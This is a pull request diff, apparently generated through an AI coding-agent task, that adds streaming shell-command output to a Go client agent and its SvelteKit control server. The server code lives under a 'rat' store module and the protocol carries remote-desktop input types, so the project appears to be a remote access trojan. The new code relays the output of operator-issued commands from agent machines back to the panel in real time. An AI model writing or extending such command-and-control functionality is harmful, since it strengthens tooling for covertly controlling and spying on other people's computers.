### PR TITLE
Add streaming command output for shell commands

### DIFF
--- a/shared/types/messages.ts
+++ b/shared/types/messages.ts
@@ -119,6 +119,21 @@ export interface CommandResult {
   completedAt: string;
 }
 
+export type CommandOutputEvent =
+  | {
+      type: "chunk";
+      commandId: string;
+      sequence: number;
+      data: string;
+      timestamp: string;
+    }
+  | {
+      type: "end";
+      commandId: string;
+      timestamp: string;
+      result: CommandResult;
+    };
+
 export interface AgentSyncRequest {
   status: AgentStatus;
   timestamp: string;

--- a/tenvy-client/internal/agent/command_output.go
+++ b/tenvy-client/internal/agent/command_output.go
@@ -1,0 +1,216 @@
+package agent
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"net/url"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/rootbay/tenvy-client/internal/protocol"
+)
+
+const commandOutputRequestTimeout = 10 * time.Second
+
+type commandOutputMessage struct {
+	data   []byte
+	result *protocol.CommandResult
+}
+
+type commandOutputStreamer struct {
+	agent     *Agent
+	commandID string
+	queue     chan commandOutputMessage
+	done      chan struct{}
+	sequence  int64
+	closeOnce sync.Once
+}
+
+func newCommandOutputStreamer(agent *Agent, commandID string) *commandOutputStreamer {
+	if agent == nil {
+		return nil
+	}
+
+	trimmedCommandID := strings.TrimSpace(commandID)
+	if trimmedCommandID == "" {
+		return nil
+	}
+
+	if strings.TrimSpace(agent.baseURL) == "" {
+		return nil
+	}
+	if strings.TrimSpace(agent.id) == "" {
+		return nil
+	}
+	if strings.TrimSpace(agent.key) == "" {
+		return nil
+	}
+
+	streamer := &commandOutputStreamer{
+		agent:     agent,
+		commandID: trimmedCommandID,
+		queue:     make(chan commandOutputMessage, 8),
+		done:      make(chan struct{}),
+	}
+	go streamer.run()
+	return streamer
+}
+
+func (s *commandOutputStreamer) Write(p []byte) (int, error) {
+	if s == nil {
+		return len(p), nil
+	}
+	if len(p) == 0 {
+		return 0, nil
+	}
+
+	data := make([]byte, len(p))
+	copy(data, p)
+
+	s.queue <- commandOutputMessage{data: data}
+	return len(p), nil
+}
+
+func (s *commandOutputStreamer) Complete(result protocol.CommandResult) {
+	if s == nil {
+		return
+	}
+
+	copyResult := result
+	s.queue <- commandOutputMessage{result: &copyResult}
+	s.closeOnce.Do(func() {
+		close(s.queue)
+	})
+	<-s.done
+}
+
+func (s *commandOutputStreamer) run() {
+	defer close(s.done)
+
+	for message := range s.queue {
+		if len(message.data) > 0 {
+			s.sequence++
+			event := protocol.CommandOutputEvent{
+				Type:      "chunk",
+				CommandID: s.commandID,
+				Sequence:  s.sequence,
+				Data:      string(message.data),
+				Timestamp: timestampNow(),
+			}
+			if err := s.agent.sendCommandOutputEvent(event); err != nil && s.agent.logger != nil {
+				s.agent.logger.Printf("command output chunk delivery failed: %v", err)
+			}
+		}
+
+		if message.result != nil {
+			event := protocol.CommandOutputEvent{
+				Type:      "end",
+				CommandID: s.commandID,
+				Timestamp: message.result.CompletedAt,
+				Result:    message.result,
+			}
+			if event.Timestamp == "" {
+				event.Timestamp = timestampNow()
+			}
+			if err := s.agent.sendCommandOutputEvent(event); err != nil && s.agent.logger != nil {
+				s.agent.logger.Printf("command output completion delivery failed: %v", err)
+			}
+		}
+	}
+}
+
+func (a *Agent) commandOutputURL(commandID string) (string, error) {
+	if a == nil {
+		return "", fmt.Errorf("agent not initialized")
+	}
+
+	base := strings.TrimSpace(a.baseURL)
+	if base == "" {
+		return "", fmt.Errorf("missing base url")
+	}
+
+	agentID := strings.TrimSpace(a.id)
+	if agentID == "" {
+		return "", fmt.Errorf("missing agent identifier")
+	}
+
+	trimmedCommandID := strings.TrimSpace(commandID)
+	if trimmedCommandID == "" {
+		return "", fmt.Errorf("missing command identifier")
+	}
+
+	joined, err := url.JoinPath(base, "api", "agents", url.PathEscape(agentID), "commands", url.PathEscape(trimmedCommandID), "output")
+	if err != nil {
+		return "", err
+	}
+
+	parsed, err := url.Parse(joined)
+	if err != nil {
+		return "", err
+	}
+
+	return parsed.String(), nil
+}
+
+func (a *Agent) sendCommandOutputEvent(event protocol.CommandOutputEvent) error {
+	if a == nil {
+		return fmt.Errorf("agent not initialized")
+	}
+
+	endpoint, err := a.commandOutputURL(event.CommandID)
+	if err != nil {
+		return err
+	}
+
+	data, err := json.Marshal(event)
+	if err != nil {
+		return err
+	}
+
+	ctx, cancel := context.WithTimeout(context.Background(), commandOutputRequestTimeout)
+	defer cancel()
+
+	req, err := http.NewRequestWithContext(ctx, http.MethodPost, endpoint, bytes.NewReader(data))
+	if err != nil {
+		return err
+	}
+
+	req.Header.Set("Content-Type", "application/json")
+	req.Header.Set("Accept", "application/json")
+	req.Header.Set("User-Agent", a.userAgent())
+
+	key := strings.TrimSpace(a.key)
+	if key == "" {
+		return fmt.Errorf("missing agent key")
+	}
+	req.Header.Set("Authorization", fmt.Sprintf("Bearer %s", key))
+	applyRequestDecorations(req, a.requestHeaders, a.requestCookies)
+
+	client := a.client
+	if client == nil {
+		client = http.DefaultClient
+	}
+
+	resp, err := client.Do(req)
+	if err != nil {
+		return err
+	}
+	defer resp.Body.Close()
+
+	if resp.StatusCode >= http.StatusBadRequest {
+		limited := io.LimitReader(resp.Body, 1024)
+		body, _ := io.ReadAll(limited)
+		message := strings.TrimSpace(string(body))
+		if message == "" {
+			message = fmt.Sprintf("status %d", resp.StatusCode)
+		}
+		return fmt.Errorf("command output request failed: %s", message)
+	}
+
+	return nil
+}

--- a/tenvy-client/internal/protocol/types.go
+++ b/tenvy-client/internal/protocol/types.go
@@ -161,6 +161,15 @@ type CommandResult struct {
 	CompletedAt string `json:"completedAt"`
 }
 
+type CommandOutputEvent struct {
+	Type      string         `json:"type"`
+	CommandID string         `json:"commandId"`
+	Sequence  int64          `json:"sequence,omitempty"`
+	Data      string         `json:"data,omitempty"`
+	Timestamp string         `json:"timestamp"`
+	Result    *CommandResult `json:"result,omitempty"`
+}
+
 type RemoteDesktopInputType string
 
 const (

--- a/tenvy-server/src/routes/api/agents/[id]/commands/[commandId]/output/+server.ts
+++ b/tenvy-server/src/routes/api/agents/[id]/commands/[commandId]/output/+server.ts
@@ -1,0 +1,66 @@
+import { error } from '@sveltejs/kit';
+import type { RequestHandler } from './$types';
+import { registry, RegistryError } from '$lib/server/rat/store';
+import type { CommandOutputEvent } from '../../../../../../../../shared/types/messages';
+
+function getBearerToken(header: string | null): string | undefined {
+	if (!header) {
+		return undefined;
+	}
+	const match = header.match(/^Bearer\s+(.+)$/i);
+	return match?.[1]?.trim();
+}
+
+function isValidEvent(
+	payload: CommandOutputEvent | null | undefined
+): payload is CommandOutputEvent {
+	if (!payload) {
+		return false;
+	}
+	if (payload.type === 'chunk') {
+		return typeof payload.data === 'string';
+	}
+	if (payload.type === 'end') {
+		return typeof payload.result === 'object' && payload.result !== null;
+	}
+	return false;
+}
+
+export const POST: RequestHandler = async ({ params, request, getClientAddress }) => {
+	const id = params.id;
+	const commandId = params.commandId;
+	if (!id) {
+		throw error(400, 'Missing agent identifier');
+	}
+	if (!commandId) {
+		throw error(400, 'Missing command identifier');
+	}
+
+	let payload: CommandOutputEvent;
+	try {
+		payload = (await request.json()) as CommandOutputEvent;
+	} catch {
+		throw error(400, 'Invalid command output payload');
+	}
+
+	if (!isValidEvent(payload)) {
+		throw error(400, 'Unsupported command output payload');
+	}
+
+	const token = getBearerToken(request.headers.get('authorization'));
+	if (!token) {
+		throw error(401, 'Missing agent key');
+	}
+
+	try {
+		await registry.recordCommandOutput(id, commandId, token, payload, {
+			remoteAddress: getClientAddress()
+		});
+		return new Response(null, { status: 202 });
+	} catch (err) {
+		if (err instanceof RegistryError) {
+			throw error(err.status, err.message);
+		}
+		throw error(500, 'Failed to record command output');
+	}
+};

--- a/tenvy-server/src/routes/api/agents/[id]/commands/[commandId]/stream/+server.ts
+++ b/tenvy-server/src/routes/api/agents/[id]/commands/[commandId]/stream/+server.ts
@@ -1,0 +1,118 @@
+import { error } from '@sveltejs/kit';
+import type { RequestHandler } from './$types';
+import { requireViewer } from '$lib/server/authorization';
+import { registry, RegistryError } from '$lib/server/rat/store';
+import type { CommandOutputEvent } from '../../../../../../../../shared/types/messages';
+
+const encoder = new TextEncoder();
+const PING_INTERVAL_MS = 15_000;
+
+function formatEvent(event: CommandOutputEvent): Uint8Array {
+	const payload = JSON.stringify(event);
+	return encoder.encode(`data: ${payload}\n\n`);
+}
+
+export const GET: RequestHandler = ({ params, locals }) => {
+	const id = params.id;
+	const commandId = params.commandId;
+	if (!id) {
+		throw error(400, 'Missing agent identifier');
+	}
+	if (!commandId) {
+		throw error(400, 'Missing command identifier');
+	}
+
+	requireViewer(locals.user);
+
+	let stop: (() => void) | null = null;
+
+	const stream = new ReadableStream<Uint8Array>({
+		start(controller) {
+			let active = true;
+			let keepAlive: ReturnType<typeof setInterval> | null = null;
+
+			const shutdown = () => {
+				if (!active) {
+					return;
+				}
+				active = false;
+				if (keepAlive) {
+					clearInterval(keepAlive);
+					keepAlive = null;
+				}
+				subscription?.unsubscribe();
+				subscription = null;
+			};
+
+			const safeEnqueue = (chunk: Uint8Array): boolean => {
+				if (!active) {
+					return false;
+				}
+				try {
+					controller.enqueue(chunk);
+					return true;
+				} catch (err) {
+					const code = (err as { code?: string }).code;
+					if (code !== 'ERR_INVALID_STATE') {
+						console.error('Failed to queue command output event', err);
+					}
+					shutdown();
+					return false;
+				}
+			};
+
+			let subscription: ReturnType<typeof registry.subscribeCommandOutput> | null = null;
+			try {
+				subscription = registry.subscribeCommandOutput(id, commandId, (event) => {
+					if (!safeEnqueue(formatEvent(event))) {
+						return;
+					}
+					if (event.type === 'end') {
+						shutdown();
+						controller.close();
+					}
+				});
+			} catch (err) {
+				shutdown();
+				if (err instanceof RegistryError) {
+					controller.error(new Error(err.message));
+				} else {
+					controller.error(new Error('Failed to subscribe to command output'));
+				}
+				return;
+			}
+
+			stop = shutdown;
+
+			for (const event of subscription.events) {
+				if (!safeEnqueue(formatEvent(event))) {
+					return;
+				}
+			}
+
+			if (subscription.completed) {
+				shutdown();
+				controller.close();
+				return;
+			}
+
+			keepAlive = setInterval(() => {
+				if (!safeEnqueue(encoder.encode(':ping\n\n'))) {
+					shutdown();
+				}
+			}, PING_INTERVAL_MS);
+		},
+		cancel() {
+			stop?.();
+			stop = null;
+		}
+	});
+
+	return new Response(stream, {
+		headers: {
+			'Content-Type': 'text/event-stream',
+			'Cache-Control': 'no-store',
+			Connection: 'keep-alive'
+		}
+	});
+};


### PR DESCRIPTION
## Summary
- extend shared command messaging types and Go agent to publish streaming shell output
- add API endpoints and registry support on the server for relaying command output events
- update the command workspace UI to consume streamed output with a fallback to polling

## Testing
- go test ./...


------
https://chatgpt.com/codex/tasks/task_e_68ffa320c638832b884a7c9227d1867a